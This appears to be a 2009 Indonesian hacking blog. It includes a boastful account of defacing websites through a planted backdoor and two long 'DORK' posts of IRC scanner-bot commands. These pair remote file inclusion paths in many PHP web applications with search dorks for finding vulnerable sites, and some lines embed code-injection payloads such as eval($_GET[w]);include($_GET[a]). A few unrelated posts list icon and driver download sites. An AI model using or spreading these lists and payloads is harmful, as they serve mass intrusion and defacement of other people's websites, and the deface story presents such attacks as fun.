(untuk melihat isi setiap column)

Selanjutnya terserah anda. Untuk bantuan panggil aja --help .
Neh download toolsnya disini .

Kalo ada tulisan yang gak jelas liat aja di POST RSS.

Happy Hacking....!!!!

Me Feat MISTERFRIBO Lompat-Lompatan...!!!

2009-10-14T21:48:00.001+07:00

Ketika itu waktu menunjukan pukul 15.00 Wib dan gw pukul 16.00 Wib sudah harus berangkat untuk kuliah karena perjalanan gw dari kantor ke tempat kuliah cukup jauh memakan waktu kurang lebih 75 Menit. Tak ada niat dalam hati untuk mendeface karena gw lagi asik edit blog ini. Tahu-tahu muncul sosok ghoib di YM gw dengan Nick MISTERFRIBO. Ketika gw tunjukan BD ke Fribo BD yang udah gw tanem, dia bilang " ada banyak tuh,, hajarlah. Kalo gw mau liat Databasenya aja ". Tanpa basa-basi langsung aja gw bantai karena rasa kangen gw terhadap BD dan deface memuncak.
Berikut Websitenya :

Lumayan deh buat iseng. Kalo gak keliatan berarti udah diapus adminnya, jadi liat aja mirrornya di INDEVES. Tanpa terasa waktu menunjukan pukul 16.30 Wib. Gw langsung kaget, gw harus segera berangkat kuliah coz ada jam praktek M.Kul C++. Berhubung gw newbie yang lagi mau belajar C++, langsung aja gw shutdown komputer gw dan berangkat kuliah. Sepanjang perjalanan gw berdoa semoga gak macet, tetep aja macet tapi gak parah banget. Berhubung dulu sering kebut-kebutan, akhirnya gw sampe kampus jam 17.15 Wib. Manteeeeepp....!!!

Free Icon

2009-10-14T13:47:00.000+07:00

Buat kalian yang senang merubah-ubah tampilan komputer agar lebih menarik, disini gw cuma mau share aja tempat download icon gratis dan cukup lengkap. Kalian bisa mengexpresikan apa yang kalian mau pada tampilan komputer kalian. Download icon disini.

Download Driver Computer Disini

2009-10-14T13:08:00.001+07:00

Situs terbaik penyedia driver komputer

Berikut situs-situs yang menyediakan driver tersebut yang dianggap terbaik, cukup lengkap dan patut direkomendasikan kepada kamu:

1. Driver Guide - Situs ini bisa dibilang situs yang lengkap karena menawarkan driver yang beragam untuk banyak device dan sudah mendapat banyak penghargaan seperti dari PC Magazine dan PC World. Anda mesti mendaftar terlebih dahulu untuk dapat men-download driver yang anda cari - Jumlah Drivers, firmware, utilities, and manuals ada sekitar 438,458 - Ada fasilitas wizard buat search driver - Member join free - Free software (toolkit, repair, utility) untuk di download

2. Driver Zone - Situs ini menawarkan pencarian driver yang lebih simple dan efisien tanpa perlu mendaftar terlebih dahulu. Situs ini semacam search engine seperti google dalam mencari driver yang dibagi menjadi 2 cara pencarian, yang pertama adalah mencari nama perusahaan pembuat hardware dan yang kedua mencari nama atau nomor seri produk yang anda cari driver-nya. Selain itu anda bisa langsung meng-klik icon driver yang anda cari langsung untuk pencarian secara manual

3. Driver Files - Situs ini hampir sama dengan situs Driver Zone dengan menawarkan driver gratis tanpa bayar dan tidak perlu registrasi, cukup anda cari langsung dengan fasilitas pencariannya ataupun secara manual. Anda juga dapat men-download software Driver Detective yang digunakan untuk mengecek driver mana yang rusak atau bermasalah secara gratis. Anda juga dapat mengirim atau meminta driver kalau anda tidak menemukan driver yang anda cari

NB: Hati-Hati terhadap spyware pada Situs tersebut diatas, harap antivirus di update terlebih dahulu....!

sumber : http://aliciakomputer.blogspot.com

DORK Part 3

2009-10-14T06:25:00.005+07:00

DORK Part 3

!scan /servicios/tagboard/sp/ftag.php?mostrar= “tagboard”
!scan /manager/static/view.php?propID=0&INC= “phpRealty” “phpRealty”
!scan /footer.php?footer_file= “PHP-Crawler”
!scan /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= “Technote7″
!scan /includes/function_core.php?web_root= “X10media Mp3 Search Engine”
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement – © 2002-2004 by Christian Scheb – Stylemotion.de

!scan /?installed_config_file= “PhpJobScheduler”
!scan /pjsfiles/modify.php?installed_config_file= “PhpJobScheduler”
!scan errors.php?error= “/com_rwcards” “/com_rwcards”
!scan //vwar/backup/errors.php?error= “errors.php”
!scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “powered by CMS Made Simple version”
!scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
!scan /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= “php?option=com_rwcards” “php?option=com_rwcards”
!scan inc/functions.inc.php?config[ppa_root_path]= “Index – Albums”
!scan phphtml.php?htmlclass_path= “phphtml.php”
!scan lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “/adodb_lite” “/adodb_lite”
!scan /?path%5Bdocroot%5D= “/newspublish” “/newspublish”
!scan /?sIncPath= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22
!scan errors.php?error= “netcat_files”
!scan /index.php?DOCUMENT_ROOT= “netcat_files”
!scan errors.php?error= %22Home%22+%22%7C%22+%22Sell+an+item%22+%22%7C%22+%22Register+now%22+%22%7C%22+%22Login%22+%22%7C%22+%22Help%22+%22%7C%22+%22About+Us%22+%22%7C%22+%22Terms+%26+Conditions%22
!scan /?prefix= %22Home%22+%22%7C%22+%22Sell+an+item%22+%22%7C%22+%22Register+now%22+%22%7C%22+%22Login%22+%22%7C%22+%22Help%22+%22%7C%22+%22About+Us%22+%22%7C%22+%22Terms+%26+Conditions%22
!scan ?sIncPath= “powered by boonex”
!scan plugins/safehtml/HTMLSax3.php?dir[plugins]= “powered by boonex”
!scan errors.php?error= “powered by boonex”
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= “powered by boonex”
!scan errors.php?error= “/ray.3.5″ “/ray.3.5″
!scan ?sourcedir= index.php?sourcedir=
!scan errors.php?error= “/com_ponygallery”
!scan /?page= /?pagedb=?
!scan hw3.php?daysonly=0).include($_GET[file]).(0&file= “Current Conditions” “Sun & Moon Information”
!scan /?page= “ArticleBeach”
!scan /tools/send_reminders.php?noSet=0&includedir= includes/php-dbi.php
!scan /Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]= “Powered by Orca Interactive Forum Script”
!scan errors.php?error= “Powered by Orca Interactive Forum Script”
!scan /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= “/sohoadmin/”
!scan /?include_path= “guestbook”
!scan /?include_path= “action”+”poll_ident”
!scan /admin/include/lib.module.php?mod_root= “/cmsworks”
!scan errors.php?error= “/com_extcalendar”
!scan /admin/templates/template_thumbnail.php?thumb_template= “Powered by HomePH Design”
!scan /includes/header.php?c_temp_path= “/header.php”
!scan /include/admin.lib.inc.php?site_path= “include/lib.inc.php”
!scan src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT= “/resource/categories”
!scan errors.php?error= “phpkit” “phpkit”
!scan errors.php?error= “/contenido/includes”
!scan popup.php?path= “phpkit” “phpkit”
!scan /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= “/contenido/includes”
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= “/plugins/jrBrowser/”
!scan /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file= /weather/hw3.php/
!scan /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= “com_pollxt”
!scan /ktmllite/includes/ktedit/toolbar.php?dirDepth= “ktmllite” “ktmllite”
!scan errors.php?error= “Subdreamer”
!scan //?custompluginfile%5B%5D= Created by Subdreamer CMS
!scan lostpasswd.php?env[include_prefix]= bookmark4u
!scan /poll/png.php?include_path= “action”+”poll_ident”
!scan /inc/formmail.inc.php?script_root= “Powered By Form Mail Script”
!scan /phpAdsNew/view.inc.php?phpAds_path= “Copyright 2000-2002, PHPAUCTION.ORG”
!scan /authentication/errors.php?error= “phpbb3″
!scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]= /phpbb3/
!scan errors.php?error= “phpRaider”
!scan /poll/booth.php?include_path= “action”+”poll_ident”
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “index.php%3Fpr%3D+site%3Anet”
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “index.php%3Fpr%3D+site%3Aorg”
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “index.php%3Fpr%3D+site%3Aus”
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “index.php%3Fpr%3D+site%3Aru”
!scan amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= 12%22If+you+are+a+registered+member%2C+please+login.+If+you+are+not+registered+yet%2C+please+signup.%22
!scan /admin.php?include_path= “Total Records:” “HTML code is” “guestbook”
!scan /guestbook1//admin.php?include_path= “guestbook1″
!scan poll/booth.php?include_path= “Advanced Poll”
!scan index.php?url= index.php?url=
!scan /galeria.php?start=0&kategoria= /galeria.php?start=0&kategoria=
!scan home.php?index= “home.php?index=”
!scan head.php?adresa= head.php?
!scan /poll/png.php?include_path= extcalendar
!scan /includes/db_adodb.php?baseDir= “dotProject logo”
!scan index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid= allinurl: aid “com_xfaq”
!scan /jscript.php?my_ms[root]= intitle:”myspeach” “chat_exemple.php”
!scan includes/stats.inc.php?prefix= browse.php%3Fid%3D site:com
!scan components/com_sitemap/sitemap.php?mosConfig_admin_path= /component/option,com_sitemap/
!scan /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_= “Powered by Mambo”
!scan includes/useragent.inc.php?prefix= “/browse.php?id=”
!scan docs/front-end-demo/cart2.php?workdir= %22hosting.php?pt=r%22 site:au
!scan /include/lib.inc.php?site_path= “lib.inc.php”
!scan /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]= “Joomla Component mosDirectory”
!scan /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path= “/includes/joomla.php”
!scan /guestbook/errors.php?error= “Guestbook – Administration”
!scan /index.php?page= index.php%”Submit%Articles”%”Member%Login”%”Top%Authors”
!scan errors.php?error= “powered by TalkBack”
!scan /components/errors.php?error= “com_simpleboard”
!scan /modules/errors.php?error= “/includes/mambo.php”
!scan /errors.php?error= “Joomla Visites”
!scan /modules/Forums/admin/errors.php?error= com_gallery
!scan /include/bbs.lib.inc.php?site_path= “/rgboard/”
!scan /ch_readalso.php?read_xml_include= “Copyrights © 2005 Belgische Federale Overheidsdiensten”
!scan /txt-db-api/txt-db-api.php?API_HOME_DIR= “powered by Crafty Syntax Live Help 2.7″
!scan /dotproject//includes/db_connect.php?baseDir= “dotproject”
!scan modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE= modules/dungeon
!scan /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path= “com_letterman”
!scan /index.php?config=1&base_datapath= wmview.php
!scan errors.php?error= “index”+”of/”+”errors.php”
!scan /accounts/inc/include.php?language=0&lang_settings[0][1]= “powered by Icewarp”
!scan /include/write.php?dir= “/write.php?dir=”
!scan /errors.php?error= /errors.php?error=
!scan /components/com_flyspray/startdown.php?file= “/com_flyspray”
!scan /modules/xfsection/modify.php?dir_module= “xfsection” “xfsection”
!scan /common/db.php?commonpath= “samPHPweb” “samPHPweb”
!scan errors.php?error= “samPHPweb” “samPHPweb”
!scan config.inc.php?path_escape= “XZero Community Classifieds” “XZero Community Classifieds”
!scan inc/TabStrip.php?function= “includeTab” “includeTab”
!scan /config.inc.php?path_escape= “Classifieds for our community”
!scan errors.php?error= “Classifieds for our community”
!scan /admin/spaw/spaw_control.class.php?spaw_root= “xt_conteudo” “xt_conteudo”
!scan errors.php?error= “/appserv”
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a= “index.php?name=PNphpBB2″
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= “index.php?name=PNphpBB2″
!scan /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight= “index.php?name=PNphpBB2″
!scan /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “com_comprofiler” “com_comprofiler”
!scan /includes/mailaccess/pop3.php?CONFIG[pear_dir]= “mailaccess”
!scan /includes/functions_portal.php?phpbb_root_path= “phpbb” “phpbb”
!scan /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= “MakeXML4statusCounter.php” “MakeXML4statusCounter.php”
!scan /inc/cmses/aedatingCMS.php?dir%5Binc%5D= “cmses” “cmses”
!scan /import_export/pages/index.inc.php?REX[INCLUDE_PATH]= “Redaxo 2.7.4″ “Redaxo 2.7.4″
!scan /faqsupport/samplefaqsupport.php?path[docroot]= “OneAdmin” “OneAdmin”
!scan /ecommerce/payment/cybersource.php?path[docroot]= “ecommerce”
!scan /doceboCms/class/class.dashboard_cms.php?where_framework= “doceboCms” “doceboCms”
!scan /config/dbutil.bck.php?confdir= “/config/dbutil.bck.php”
!scan /config.inc.php?config%5broot_dir%5d= “CLASSIFIEDS”
!scan /claroline/tracking/userLog.php?rootSys= /claroline/ /claroline/
!scan /claroline/phpbb/page_tail.php?includePath= /claroline/ /claroline/
!scan /citywriter/head.php?path= /citywriter/
!scan /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D= /bookmark4u/ /bookmark4u/
!scan /atom.php5?page= “atom.php5?page=”
!scan /ashnews.php?pathtoashnews= “pathtoashnews”
!scan /newspublish/include.php?path%5Bdocroot%5D= “newspublish”
!scan /agendax/addevent.inc.php?agendax_path= /agendax/
!scan /PHP_CON/Exchange/include.php?webappcfg[APPPATH]= “PHP-CON v1.3″ “PHP-CON v1.3″
!scan /Neos_Chronos/header.php?base_folder= /Neos_Chronos/ /Neos_Chronos/
!scan /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path= “com_chronocontact” “com_chronocontact”
!scan /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= /mwchat/ /mwchat/
!scan /%5Cecommerce%5Cpapyment%5Ccybersource.php?path[docroot]= “Cecommerce” “Cecommerce”
!scan /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path= /excelwriter/ /excelwriter/
!scan /inc/download_center_lite.inc.php?script_root= “Download Center Lite”
!scan /encapscms_PATH/core/core.php?root= “encapscms 0.3.6″ “encapscms 0.3.6″
!scan /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= “com_thopper”
!scan /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= “com_pccookbook”
!scan /admin/business_inc/saveserver.php?thisdir= “saveserver.php”
!scan /admin/classes/TplLoad.php?full_path_to_public_program= “TplLoad.php”
!scan /PhpLinkExchange/bits_listings.php?svr_rootP= /PhpLinkExchange/
!scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= /PNphpBB2/
!scan /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= “com_mambowiki”
!scan /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path= “com_mambots”
!scan /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path= “com_mambatstaff”
!scan /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path= “com_magazine”
!scan /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path= “com_lurm_constructor”
!scan /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path= “com_loudmounth”
!scan /index.php?option=com_log&Itemid=&mosConfig_absolute_path= “com_log”
!scan /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path= “com_lmo”
!scan /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path= “com_linkdirectory”
!scan /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path= “com_kochsuite”
!scan /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path= “com_jreactions”
!scan /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path= “com_loudmounth”
!scan /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path= “com_dbquery”
!scan /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path= “com_datsogallery”
!scan /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path= “com_bayesiannaivefilter”
!scan /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= /xoopsgallery/ /xoopsgallery/
!scan /skin/zero_vote/error.php?dir= “zeroboard”
!scan /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path= “/mambots/content/” “/mambots/content/”
!scan /drupal/?_menu[callbacks][1][callback]= “drupal”
!scan /config.inc.php?path_escape= “Powered by SNETWORKS PHP CLASSIFIEDS”
!scan /?mosConfig_absolute_path= “Joomla” “Joomla”
!scan /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= “index.php?autoLoadConfig”
!scan /skin/zero_vote/ask_password.php?dir= “zeroboard” net “zeroboard” uk
!scan classes/core/language.php?rootdir= “LimeSurvey”
!scan classes/core/language.php?rootdir= “You have not provided a survey identification number”
!scan PHPDJ_v05/dj/djpage.php?page= allintext:”PHPDJ was created by www.php-mania.co.uk”
!scan /inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan index.php?redir= inurl:”index.php?redir=”
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= intitle:PHPOpenChat ext:php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:”us/index.php?option=com_remository
!scan inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” inurl:index.php
!scan inc/cmses/aedatingCMS.php?dir[inc]= allinurl:”cmses”
!scan phphtml.php?htmlclass_path= phphtml.php
!scan /phpsecurityadmin/include/logout.php?PSA_PATH= “PHPSecurityAdmin”
!scan components/com_colorlab/admin.color.php?mosConfig_live_site= com_colorlab
!scan /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= “Advanced Poll”
!scan active/components/xmlrpc/client.php?c[components]= “Pindorama”
!scan apps/apps.php?app= WebDesktop
!scan nuseo/admin/nuseo_admin_d.php?nuseo_dir= “NuSEO PHP”
!scan drupal/?_menu[callbacks][1][callback]= Drupal
!scan tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= TikiWiki
!scan administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path= com_jcs
!scan administrator/components/com_jcs/view/register.php?mosConfig_absolute_path= com_jcs
!scan components/com_mp3_allopass/allopass.php?mosConfig_live_site= com_mp3_allopass
!scan scan administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path= “com_jcs”
!scan /modules/coppermine/themes/default/theme.php?THEME_DIR= “”Powered by Coppermine”
!scan /default.php?page=home inurl:”/default.php?page=home”
!scan /default.php?page= inurl:”/default.php?page=home”
!scan /PhpLinkExchange/bits_listings.php?svr_rootPhpStart= inurl:PhpLinkExchange
!scan /openi-admin/base/fileloader.php?config[openi_dir]= Powered by OPENi-CMS
!scan /components/com_mp3_allopass/allopass.php?mosConfig_live_site=
!scan /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=
!scan index.php?root_path= “powered by Open Bulletin Board”
!scan config.php?fpath= “Powered By PUMA”
!scan /index.php?classified_path= “Vivvo Article Manager”
!scan index.php?base= powered by MyABraCaDaWeb
!scan pop.php?base= powered by MyABraCaDaWeb
!scan extras/ext_cats.php?dir_path= photokorn 1.52
!scan content/article.php?ide= inurl:WM-News
!scan content/modify_go.php?pwfile= inurl:WM-News
!scan protection.php?action=logout&siteurl= allinurl%3Amembers.php%3Fid%3Dall+site%3Anet
!scan /inc/header.php/step_one.php?server_inc= step_one.php?sid
!scan /language/lang_english/lang_main_album.php?phpbb_root_path= “Powered by phpBB2″ site:fr
!scan language/lang_english/lang_main_album.php?phpbb_admin_path= phpBB
!scan phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan index.php?themesdir= “Segue v.”+”Middlebury College”
!scan lib/base.php?BaseCfg[BaseDir]= actSite
!scan index.php?themesdir= “Segue v.”+”Middlebury College”
!scan /includes/openid/Auth/OpenID/BBStore.php?openid_root_path= “phpBB”
!scan contrib/mx_glance_sdesc.php?mx_root_path= “mx_glance”
!scan contrib/mx_glance_sdesc.php?mx_root_path= “mxBB”
!scan amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= “amember”
!scan news/newstopic_inc.php?indir= “Public Media Manager”
!scan phfito/phfito-post?SRC_PATH= “phpFidoNode”
!scan /protection.php?action=logout&siteurl= “/members.php?id=all”
!scan /appserv/main.php?appserv_root= “The AppServ Open Project”
!scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD
!scan admin/include/header.php?repertoire= “chupix cms”
!scan forum/forum.php?view= “lustig.cms”
!scan access/login.php?path_to_root= “FrontAccounting”
!scan includes/lang/language.php?path_to_root= “FrontAccounting”
!scan dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth= “DFD Cart”
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth= “DFD Cart”
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth= “DFD Cart”
!scan show.php?file= “Helplink”
!scan data/compatible.php?module_name= “Nuke Mobile Entartainment”
!scan config.inc.php?_path= “WordSmith”
!scan modules/search/search.php?language_home=&rootdp=zZz&gsLanguage= “iziContents”
!scan modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage= “iziContents”
!scan modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage= “iziContents”
!scan modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage= “iziContents”
!scan modules/links/submit_links.php?rootdp=zZz&gsLanguage= “iziContents”

DORK Part 2

2009-10-14T06:20:00.004+07:00

DORK Part 2

!scan /intern/admin/?rootdir= “phpBG”
!scan /intern/clan/member_add.php?rootdir= “phpBG”
!scan /intern/config/key_2.php?rootdir= “phpBG”
!scan /intern/config/forum.php?rootdir= “phpBG”
!scan xGB.php?act=admin&do= allinurl:”xGb.php”
!scan modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= “mvcw_conver.php”
!scan convert/mvcw.php?vwar_root= “convert/mvcw.php”
!scan convert/mvcw.php?step=1&vwar_root= “convert/mvcw.php”
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= inurl:activecontent.php
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= “Php Blue Dragon”
!scan ncaster/admin/addons/archive/archive.php?adminfolder= inurl:ncaster
!scan ncaster/admin/addons/archive/archive.php?adminfolder= Ncaster 1.7.2
!scan /chat/inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:.ru
!scan database.php?mosConfig_absolute_path= “powered by mambo”
!scan config.php?path_to_root= inurl:”path_to_root”
!scan order/login.php?svr_rootscript= “order?page=plan_show”
!scan admin/inc/change_action.php?format_menue= “PHPNews Version 0.93″
!scan order/login.php?svr_rootscript= “order?page=plan_show”
!scan /include.php?path[docroot]= inurl:”newspublish”
!scan newsletter/newsletter.php?waroot= inurl:newsletter.php?
!scan mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= inurl:mediagallery/
!scan beacon/language/1/splash.lang.php?languagePath= inurl:/beacon/
!scan common/func.php?CommonAbsDir= inurl: func.php?
!scan /surveys/survey.inc.php?path= inurl:surveys
!scan index.php?body= inurl:”index.php?body=”
!scan /classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl
!scan enc/content.php?Home_Path= “powered by doodle cart”
!scan /classified_right.php?language_dir= inurl:classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= “(Powered By ScozNews)”
!scan /sources/template.php?CONFIG[main_path]= “(Powered By ScozNews)”
!scan /embed/day.php?path= intitle:”Login to Calendar”
!scan /includes/dbal.php?eqdkp_root_path= “powered by EQdkp”
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Powered By Aardvark Topsites PHP 4.2.2″
!scan /includes/kb_constants.php?module_root_path= “Powered by Knowledge Base”
!scan /mcf.php?content= allinurl:”mcf.php” site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:”com_facileforms” site:.org
!scan skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer CMS”
!scan /zipndownload.php?PP_PATH= “Powered by: PhotoPost PHP 4.6″
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:”com_serverstat”
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:”index.php?option=”com_zoom”
!scan /main.php?sayfa= inurl:”main.php?sayfa=”
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= allinurl:”/ubbthreads/”
!scan /header.php?abspath= “MobilePublisherPHP”
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:”com_performs”
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “powered by phpCOIN”
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date=
!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar
!scan /login.php?dir= allinurl:login.php?dir=
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php
!scan index.php?pageurl= inurl:”index.php?pageurl=*.php”
!scan /templates/headline_temp.php?nst_inc= “fusion news management system”
!scan index.php?var= inurl:”index.php?var=*.php”
!scan index.php?pagina= inurl:”index.php?pagina=*.php”
!scan index.php?go= inurl:”index.php?go=”
!scan index.php?site= inurl:”index.php?site=”
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”.com.*/index.php?option=com_comprofiler”
!scan index.php?pagina= inurl:”index.php?pagina=*.php”
!scan index.php?id= inurl:”index.php?id=*.php”
!scan index1.php?= inurl:”index1.php?=*.php?
!scan index.php?site= inurl:”index.php?site=*.php”
!scan main.php?id= inurl:”main.php?id=*.php”
!scan content.php?page= inurl:”content.php?page=*.php”
!scan admin.php?page= inurl:”admin.php?page=*.php”
!scan lib/gore.php?libpath= inurl:”/SQuery/”
!scan SQuery/lib/gore.php?libpath= inurl:”/SQuery/”
!scan index2.php?p= inurl:”index2.php?p=*.php”
!scan index1.php?go= inurl:”index1.php?go=*.php”
!scan news_detail.php?file= inurl:”news_detail.php?file=*.php”
!scan old_reports.php?file= inurl:”old_reports.php?file=*.php”
!scan index.php?x= inurl:”index.php?x=*.php”
!scan index.php?nic= inurl:”index.php?nic=*.php”
!scan homepage.php?sel= inurl:”homepage.php?sel=*.php”
!scan index.php?sel= inurl:”index.php?sel=*.php”
!scan main.php?x= inurl:”main.php?x=*.php”
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= “inurl:com_artlinks”
!scan index2.php?x= inurl:index2.php?x=*.php”
!scan main.php?pagina= inurl:”main.php?pagina=*.php”
!scan test.php?page= allinurl:test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= “inurl:com_phpshop”
!scan akocomments.php?mosConfig_absolute_path= inurl:akocomments.php
!scan index.php?page= inurl:”edu/index.php?page=*.php”
!scan *.php?page= inurl:*.php?page=*.php”
!scan index.php?oldal= inurl:”index.php?oldal=*.php”
!scan index.php?lang=gr&file inurl:”index.php?lang=gr&file=*.php”
!scan index.php?pag= inurl:”index.php?pag=*.php”
!scan index.php?incl= inurl:”index.php?incl=”
!scan avatar.php?page= inurl:”avatar.php?page=”
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is”
!scan ndex.php?p= inurl:”edu/index.php?p=*.php”
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/
